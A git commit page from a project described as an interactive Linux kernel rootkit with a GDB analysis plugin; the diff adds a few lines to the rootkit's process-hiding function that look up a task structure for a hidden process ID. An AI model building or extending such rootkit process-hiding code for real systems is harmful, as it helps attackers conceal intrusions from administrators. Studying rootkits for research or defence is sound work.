adds task_struct retrieval for pid - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit cc4cd67a573deadfae154a63ae4fd753ca702bb9
parent 24bf4e165decdb4673671312c26398df6280642f
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 01:41:14 +0100

adds task_struct retrieval for pid

Diffstat:
M rootkit/src/pidhide.c  | 5 +++++

1 file changed, 5 insertions(+), 0 deletions(-)
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -1,5 +1,6 @@
 #include <linux/slab.h>
 #include <linux/pid.h>
+#include <linux/sched.h>
 
 #include "hook.h"
 #include "pidhide.h"
@@ -64,6 +65,10 @@ hide_pid(pid_t pid)
     }
 
     add_pid_to_list(hidden_pids_tail, pid);
+
+    task_struct *ts = find_task_by_vid(pid);
+    if (ts)
+        DEBUG_INFO("found\n");
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs